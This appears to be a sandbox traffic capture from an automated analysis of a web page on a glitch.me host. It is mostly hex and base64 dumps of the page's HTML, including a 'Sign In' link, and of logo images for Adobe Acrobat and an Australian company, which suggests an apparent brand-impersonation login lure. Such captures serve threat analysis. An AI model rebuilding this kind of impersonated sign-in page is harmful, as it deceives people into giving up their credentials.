                                                                                                                                                                                                            2024-11-06 05:28:44 UTC8440INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 20 69 64 3d 22 70 61 67 65 54 69 74 74 6c 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 69 64 3d 22 66 61 76 69 63 6f 6e 50 61 67 65 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title id="pageTittle"></title> <link id="faviconPage" rel="shortcut icon" href="" type="image/x-icon">
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC7944INData Raw: 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 69 64 3d 22 78 78 78 78 22 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 65 6c 6c 69 70 73 69 73 2d 76 65 72 74 69 63 61 6c 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 61 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 4c 6f 67 6f 22 20 69 64 3d 22 68 65 61 6e 61 6d 65 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 22 3e 53 69 67 6e 20 49 6e 3c
                                                                                                                                                                                                            Data Ascii: fa-download" style="color: white;"></i> <i id="xxxx" class="fa-solid fa-ellipsis-vertical" style="color: white;"></i> ... <a class="profileLogo" id="heaname" style="color: black; background-color: white;">Sign In<
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC515INData Raw: 76 6b 4b 4c 57 6e 51 55 55 44 67 68 43 6f 58 79 69 34 30 51 53 78 63 76 58 73 53 5a 30 32 64 45 6c 4c 61 4d 45 4f 73 5a 75 2b 4d 4e 41 6a 48 52 30 53 68 61 72 43 67 53 45 68 4b 38 59 59 34 32 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 43 41 6f 43 47 53 66 4f 49 71 30 2f 58 75 51 55 72 30 4f 6f 6f 34 66 52 73 54 4b 42 55 68 66 73 77 78 5a 71 39 63 70 2f 79 4f 76 62 59 4b 59 70 69 32 51 66 58 31 62 5a 4a 59 71 68 2f 68 64 57 78 46 62 71 53 6f 69 53 70 51 4a 69 76 36 5a 79 55 6b 70 2f 72 6f 73 2f 6d 64 58 71 51 55 49 30 56 66 32 6b 74 2b 52 76 58 59 4a 63 48 68 2f 6a 70 76 6c 4b 69 48 69 6d 6c 61 49 61 48 57 4c 2b 4f 47 2b 4b 43 4c 32 62 6b 64 2b 49 51 43
                                                                                                                                                                                                            Data Ascii: vkKLWnQUUDghCoXyi40QSxcvXsSZ02dElLaMEOsZu+MNAjHR0SharCgSEhK8YY42SIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESCAoCGSfOIq0/XuQUr0Ooo4fRsTKBUhfswxZq9cp/yOvbYKYpi2QfX1bZJYqh/hdWxFbqSoiSpQJiv6ZyUkp/ros/mdXqQUI0Vf2kt+RvXYJcHh/jpvlKiHimlaIaHWL+OG+KCL2bkd+IQC
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC16384INData Raw: 35 64 49 58 64 67 6c 45 74 6d 79 47 2b 79 37 31 49 75 66 72 61 48 4e 62 58 33 57 43 33 48 44 4e 4a 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 49 48 77 49 5a 49 74 41 31 66 4b 2f 36 4c 46 38 46 53 38 69 59 4c 58 38 4b 7a 50 55 71 7a 77 65 6f 54 4c 6c 76 6b 33 4b 4b 61 49 56 46 51 64 46 74 47 75 74 76 44 53 71 62 49 6c 73 56 55 37 73 57 4e 72 51 44 6b 68 37 56 2b 79 4b 46 36 30 59 32 79 66 2f 4b 32 66 44 66 2b 65 54 64 70 37 49 55 30 5a 4c 36 6f 51 52 4f 39 6f 72 7a 37 2f 2f 65 50 48 39 70 2f 50 7a 52 78 51 54 6e 32 2f 2f 66 65 35 70 4a 78 64 66 53 53 41 30 43 57 52 6c 5a 58 70 48 41 43 59 6a 66 35 30 36 46 32 4a 68 76 78 79 4d 2b 56 57 46 51 79 73 53 32 4e 36 39 2b 31 52 50 71 31 65 72 37 4b 44 48 7a 41 35 6e 41 72 74 32 35 35 77 66 56 61
                                                                                                                                                                                                            Data Ascii: 5dIXdglEtmyG+y71IufraHNbX3WC3HDNJgARIgARIgARIgARIgARIIHwIZItA1fK/6LF8FS8iYLX8KzPUqzweoTLlvk3KKaIVFQdFtGutvDSqbIlsVU7sWNrQDkh7V+yKF60Y2yf/K2fDf+eTdp7IU0ZL6oQRO9orz7//ePH9p/PzRxQTn2//fe5pJxdfSSA0CWRlZXpHACYjf506F2JhvxyM+VWFQysS2N69+1RPq1er7KDHzA5nArt255wfVa
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC16384INData Raw: 5a 44 53 77 74 33 37 66 75 69 4a 75 57 37 79 30 50 62 4f 2b 54 4e 50 75 32 2b 64 35 71 7a 30 78 32 66 76 6a 68 42 7a 77 69 46 74 68 30 4a 73 44 71 63 75 63 64 57 4c 78 34 4b 62 36 65 39 69 56 75 75 65 55 57 73 57 72 36 53 74 7a 61 73 52 50 71 31 71 6f 74 6f 6a 34 73 31 74 55 64 54 51 42 57 72 46 67 78 4d 55 47 77 6a 4b 70 7a 37 4e 67 78 6e 44 78 35 43 6f 55 53 45 6a 42 6e 39 69 2b 6f 56 36 2b 65 4c 6c 73 73 52 41 49 6b 51 41 49 6b 51 41 49 6b 51 41 49 6b 34 42 6b 42 61 77 48 59 69 30 4f 48 34 50 6e 6e 6e 6e 50 62 6f 43 38 46 59 4f 2b 4f 47 6f 57 33 68 34 2b 67 41 4d 7a 74 55 54 46 65 77 65 67 7a 6b 4c 2f 72 47 65 39 68 38 4e 54 55 49 77 44 37 38 6f 75 70 61 6d 47 4f 35 73 32 61 34 34 34 37 37 7a 54 55 4f 52 6d 4a 36 38 73 76 76 6c 41 52 72 46 35 39 37 66
                                                                                                                                                                                                            Data Ascii: ZDSwt37fuiJuW7y0PbO+TNPu2+d5qz0x2fvjhBzwiFth0JsDqcucdWLx4Kb6e9iVuueUWsWr6StzasRPq1qotoj4s1tUdTQBWrFgxMUGwjKpz7NgxnDx5CoUSEjBn9i+oV6+eLlssRAIkQAIkQAIkQAIk4BkBawHYi0OH4PnnnnPboC8FYO+OGoW3h4+gAMztUTFewegzkL/rGe9h8NTUIwD78oupamGO5s2a44477zTUORmJ68svvlARrF597f
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC1514INData Raw: 6a 72 65 2b 2b 2b 31 5a 2b 58 66 4b 72 48 4e 71 70 6b 2b 79 34 34 34 34 70 70 6c 4c 38 67 6b 2b 65 50 45 6e 57 72 6c 6b 6a 4c 56 76 74 4a 64 57 72 56 39 63 50 55 46 7a 48 30 35 6d 6d 76 33 48 44 42 73 6e 50 7a 39 64 31 52 36 62 54 59 76 77 6b 51 41 49 69 66 6e 57 52 31 37 78 4f 4f 74 72 32 39 65 76 57 53 64 6d 79 5a 61 56 63 2b 66 4a 70 78 59 2b 36 41 35 4e 31 4f 31 53 6f 6b 44 54 65 30 74 34 65 4a 59 55 54 38 69 62 62 2b 70 43 67 53 6f 6b 33 76 2f 4a 51 53 68 34 2f 30 6d 4f 69 66 37 4e 47 39 51 63 72 56 36 36 73 36 38 46 49 67 62 64 35 5a 6a 2f 4a 68 52 72 44 6b 41 41 4a 6b 41 41 4a 6b 41 41 4a 6b 45 44 70 49 6c 42 55 34 39 35 30 79 41 79 4b 36 35 73 4b 49 35 4d 6f 7a 58 79 4b 36 33 74 6c 76 6b 6b 67 7a 4c 64 64 58 43 6c 35 79 58 36 4c 36 37 4d 77 33 79
                                                                                                                                                                                                            Data Ascii: jre+++1Z+XfKrHNqpk+y4444pplL8gk+ePEnWrlkjLVvtJdWrV9cPUFzH05mmv3HDBsnPz9d1R6bTYvwkQAIifnWR17xOOtr29evWSdmyZaVc+fJpxY+6A5N1O1SokDTe0t4eJYUT8ibb+pCgSok3v/JQSh4/0mOif7NG9QcrV66s68FIgbd5Zj/JhRrDkAAJkAAJkAAJkEDpIlBU4950yAyK65sKI5MozXyK63tlvkkgzLddXCl5yX6L67Mw3y
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC534INData Raw: 69 68 77 64 34 78 30 38 44 4c 6a 2f 4f 4b 6d 41 47 62 33 63 2f 30 34 46 43 65 35 6e 4e 38 7a 34 50 71 4c 4c 37 77 67 55 36 5a 4f 53 65 5a 46 33 2b 74 37 78 52 56 53 76 30 48 44 51 48 2f 77 34 4c 55 49 47 4c 73 64 33 48 50 50 33 58 72 52 36 2b 6d 6e 6e 79 37 37 37 72 74 66 4c 4b 37 52 6f 30 66 4a 4c 44 55 32 4f 31 41 5a 32 4f 6a 51 38 5a 44 59 39 61 49 36 43 66 50 2b 6b 62 66 6d 65 2b 34 5a 79 54 69 52 6c 77 4b 59 33 33 67 36 31 38 5a 2b 6d 58 34 58 4d 32 62 38 6f 4a 51 47 58 39 43 37 66 76 6d 6c 64 64 68 68 68 38 6d 52 52 33 59 72 4e 6a 49 48 76 2b 64 77 76 56 34 61 79 6b 54 59 62 77 38 4b 51 79 67 4c 64 4e 34 45 58 44 6a 36 31 55 56 65 38 7a 71 75 62 66 75 34 63 57 4e 6c 37 4e 69 78 4f 74 4e 51 2f 4e 71 38 65 62 4e 57 42 49 4d 53 78 46 6c 6e 6e 65 56 6b
                                                                                                                                                                                                            Data Ascii: ihwd4x08DLj/OKmAGb3c/04FCe5nN8z4PqLL7wgU6ZOSeZF3+t7xRVSv0HDQH/w4LUIGLsd3HPP3XrR6+mnny777rtfLK7Ro0fJLDU2O1AZ2OjQ8ZDY9aI6CfP+kbfme+4ZyTiRlwKY33g618Z+mX4XM2b8oJQGX9C7fvmlddhhh8mRR3YrNjIHv+dwvV4aykTYbw8KQygLdN4EXDj61UVe8zqubfu4cWNl7NixOtNQ/Nq8ebNWBIMSxFlnneVk
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC16384INData Raw: 49 69 73 6b 46 4c 39 6c 76 4d 63 6b 36 73 30 6b 43 47 53 4e 51 6d 76 71 62 55 53 45 6d 6b 38 4d 57 5a 66 38 7a 36 6e 4d 6b 2b 69 2b 6a 70 70 58 79 38 6a 63 58 71 46 6d 6c 72 52 4e 4d 69 52 36 69 2f 72 59 4c 55 65 2f 65 76 64 56 45 31 64 59 64 77 44 5a 75 33 43 53 2f 2f 2f 61 62 66 50 72 5a 5a 34 49 46 50 68 69 34 58 4e 36 6e 6a 36 2b 56 75 71 6a 70 5a 73 6f 2f 47 34 74 4d 6b 53 31 5a 38 61 35 58 45 37 57 2f 2f 66 36 62 37 30 4f 68 7a 49 38 63 4f 56 4c 66 50 2b 4b 49 49 36 52 72 31 79 4e 39 2f 66 49 47 43 52 51 33 41 73 57 39 33 76 2f 37 37 37 2b 6c 55 71 56 4b 52 61 36 51 46 50 61 39 46 78 51 55 79 49 44 2b 74 38 69 36 39 65 76 6c 75 75 75 75 6b 31 71 31 64 6f 31 54 41 45 4d 38 68 78 78 79 69 42 78 33 33 50 47 65 55 52 61 56 41 68 67 73 66 64 35 37 37 37
                                                                                                                                                                                                            Data Ascii: IiskFL9lvMck6s0kCGSNQmvqbUSEmk8MWZf8z6nMk+i+jppXy8jcXqFmlrRNMiR6i/rYLUe/evdVE1dYdwDZu3CS///abfPrZZ4IFPhi4XN6nj6+VuqjpZso/G4tMkS1Z8a5XE7W//f6b70OhzI8cOVLfP+KII6Rr1yN9/fIGCRQ3AsW93v/777+lUqVKRa6QFPa9FxQUyID+t8i69evluuuuk1q1do1TAEM8hxxyiBx33PGeURaVAhgsfd5777
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC16384INData Raw: 6d 6a 46 47 63 6a 6d 56 41 6e 5a 67 36 42 39 64 73 42 54 43 7a 65 77 45 4d 73 46 32 68 33 6f 64 64 46 36 44 50 4d 46 49 5a 71 46 75 39 2b 68 38 35 6f 6d 76 58 6d 4b 45 49 31 37 4a 6c 35 79 63 54 35 2b 67 33 33 48 58 58 6e 58 70 63 55 30 58 4e 6c 66 65 39 38 71 6f 34 52 54 79 54 4a 75 59 32 48 6e 7a 67 41 56 6d 72 46 75 2f 57 72 46 6c 54 4b 2b 79 5a 65 36 6e 32 6b 31 7a 4c 69 45 6d 66 52 78 49 67 41 52 49 67 41 52 49 67 41 52 4c 49 4e 51 4c 4a 2b 6a 64 2b 65 58 58 70 6c 39 34 32 36 46 59 74 2f 36 6c 66 76 37 35 63 65 75 6c 6c 63 59 59 4d 48 6e 7a 6f 51 57 33 59 46 2b 6e 5a 4d 6a 36 58 66 72 5a 66 6e 6e 45 39 61 43 77 45 57 52 41 57 31 4a 6f 64 64 33 73 6d 72 48 76 7a 47 76 64 47 6c 63 6d 62 38 61 36 58 44 42 69 79 63 42 67 35 68 67 7a 34 2b 4f 4f 4f 6b 34
                                                                                                                                                                                                            Data Ascii: mjFGcjmVAnZg6B9dsBTCzewEMsF2h3oddF6DPMFIZqFu9+h85omvXmKEI17Jl5ycT5+g33HXXnXpcU0XNlfe98qo4RTyTJuY2HnzgAVmrFu/WrFlTK+yZe6n2k1zLiEmfRxIgARIgARIgARLINQLJ+jd+eXXpl9426FYt/6lfv75ceullcYYMHnzoQW3YF+nZMj6XfrZfnnE9aCwEWRAW1Jodd3smrHvzGvdGlcmb8a6XDBiycBg5hgz4+OOOk4
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC16384INData Raw: 56 79 72 76 77 72 4f 30 42 31 69 45 77 4a 31 33 33 55 6c 37 37 72 31 33 7a 54 41 4f 50 75 42 41 32 6e 66 66 66 66 6e 53 78 30 37 36 77 65 71 72 30 63 65 66 66 6c 4a 7a 57 33 4d 38 35 4d 43 44 61 4a 39 39 39 72 45 69 30 6a 6f 53 36 4b 76 41 36 6d 75 37 4f 6f 59 2b 61 4c 71 61 2b 4d 58 6e 39 4d 50 4e 4e 71 56 33 33 6e 6d 58 4e 6c 68 76 50 54 72 6a 39 44 4e 34 78 32 78 34 72 76 4e 2f 39 4c 48 48 36 42 63 2f 2f 78 6c 39 4e 57 6b 53 48 58 50 55 55 62 54 54 6a 6a 76 6c 61 6a 39 51 7a 68 42 6d 41 30 55 65 34 34 49 41 43 41 77 6b 41 52 46 6d 4a 72 34 6b 44 73 6c 62 61 6e 5a 4c 4f 33 59 38 39 59 4f 65 43 56 38 6b 4e 36 57 70 35 77 42 2f 31 45 4f 59 37 58 2f 2b 42 42 72 2f 32 52 51 36 63 61 65 52 4c 53 2f 4f 32 6b 6d 59 44 66 42 58 43 38 4e 6e 43 46 78 79 79 53 56
                                                                                                                                                                                                            Data Ascii: VyrvwrO0B1iEwJ133Ul77r13zTAOPuBA2nffffnSx076weqr0cefflJzW3M85MCDaJ999rEi0joS6KvA6mu7OoY+aLqa+MXn9MPNNqV33nmXNlhvPTrj9DN4x2x4rvN/9LHH6Bc//xl9NWkSHXPUUbTTjjvlaj9QzhBmA0Ue44IACAwkARFmJr4kDslbanZLO3Y89YOeCV8kN6Wp5wB/1EOY7X/+BBr/2RQ6caeRLS/O2kmYDfBXC8NnCFxyySV


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449741184.28.90.27443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:46 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-11-06 05:28:46 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Server: ECAcc (chd/0790)
                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                            X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                            Cache-Control: public, max-age=178533
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:28:46 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.449742184.28.90.27443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:48 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-11-06 05:28:48 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                            Cache-Control: public, max-age=178480
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:28:48 GMT
                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                            2024-11-06 05:28:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.449743185.15.59.2404432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:49 UTC700OUTGET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1
                                                                                                                                                                                                            Host: upload.wikimedia.org
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:28:49 UTC1070INHTTP/1.1 200 OK
                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                            content-disposition: inline;filename*=UTF-8''Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                                                                                            etag: 1d137f6e42bd3f8a9482eafb0c92d735
                                                                                                                                                                                                            last-modified: Thu, 11 Jul 2024 16:41:53 GMT
                                                                                                                                                                                                            content-length: 12378
                                                                                                                                                                                                            date: Tue, 05 Nov 2024 06:36:50 GMT
                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                            age: 82319
                                                                                                                                                                                                            x-cache: cp3075 hit, cp3075 miss
                                                                                                                                                                                                            x-cache-status: hit-local
                                                                                                                                                                                                            server-timing: cache;desc="hit-local", host;desc="cp3075"
                                                                                                                                                                                                            strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                            report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                            nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                            x-client-ip: 173.254.250.80
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            2024-11-06 05:28:49 UTC12378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 80 00 00 01 80 08 06 00 00 00 a4 c7 b5 bf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0b 10 29 34 2a 36 a0 70 00 00 2f 5e 49 44 41 54 78 da ed dd 77 b8 13 55 fe c7 f1 f7 99 49 2e 9d 7b 69 a2 08 d2 9b 22 0a 0a 22 45 8a 88 a8 88 8a 6b 41 5d 7b d7 45 fc d9 57 d7 ba d8 fb 5a d7 b5 77 94 55 2c 14 01 05 91 2a bd 08 48 b3 d2 db a5 df 9b 64 ce ef 8f b0 8a 48 b9 b9 99 f4 cf eb 79 7c 54 48 32 93 73 4e be 9f 39 93 cc 19 43 96 b3 55 c8 0f 87 39 d8 33 34 70 0c f5 2c d4 b3 86 fd 0d 54 c5 52 0d
                                                                                                                                                                                                            Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDtIME)4*6p/^IDATxwUI.{i""EkA]{EWZwU,*HdHy|TH2sN9CU934p,TR


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.44974613.32.27.1294432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC610OUTGET /elders.com.au HTTP/1.1
                                                                                                                                                                                                            Host: logo.clearbit.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC559INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Date: Tue, 05 Nov 2024 08:02:23 GMT
                                                                                                                                                                                                            x-envoy-response-flags: -
                                                                                                                                                                                                            Server: Clearbit
                                                                                                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            X-Cache: Hit from cloudfront
                                                                                                                                                                                                            Via: 1.1 8fd360cd20d33fa1400394ae41746f66.cloudfront.net (CloudFront)
                                                                                                                                                                                                            X-Amz-Cf-Pop: FRA56-C2
                                                                                                                                                                                                            X-Amz-Cf-Id: biNJtf6tM1yzTxizu0Kw8I5xlAGgPKKOUWK5--fzeRyhvpXSmyw0FA==
                                                                                                                                                                                                            Age: 77188
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC7286INData Raw: 31 63 36 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1c 35 49 44 41 54 78 9c ec bc 09 b4 5f 55 95 e7 bf f7 3e e7 dc 7b 7f d3 9b 5f e6 97 09 48 18 2a 0c 9a 20 14 85 a0 a0 14 20 15 fe 29 a9 72 40 ff 40 95 55 45 29 b6 88 82 8a c5 20 8a 82 d0 da 45 95 73 e1 80 94 48 ab 5d 62 d1 8d 82 0c 2a 83 03 43 18 43 20 64 4e de 4b f2 5e de f0 1b ee bd e7 9c bd 7b 9d fb 82 ae 5e dd ab 62 3a a1 7f ac e5 ef bb 58 ef f1 7e e3 bd fb 73 f6 74 86 e8 b1 79 87 40 47 ed 13 b5 fb 02 fe d0 d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5
                                                                                                                                                                                                            Data Ascii: 1c6ePNGIHDRL\5IDATx_U>{_H* )r@@UE) EsH]b*CC dNK^{^b:X~sty@GfuYmV@fuYmV@fuYmV@fuYmV@fuYmV@
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.449745185.15.59.2404432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC444OUTGET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1
                                                                                                                                                                                                            Host: upload.wikimedia.org
                                                                                                                                                                                                            Connection: keep-alive
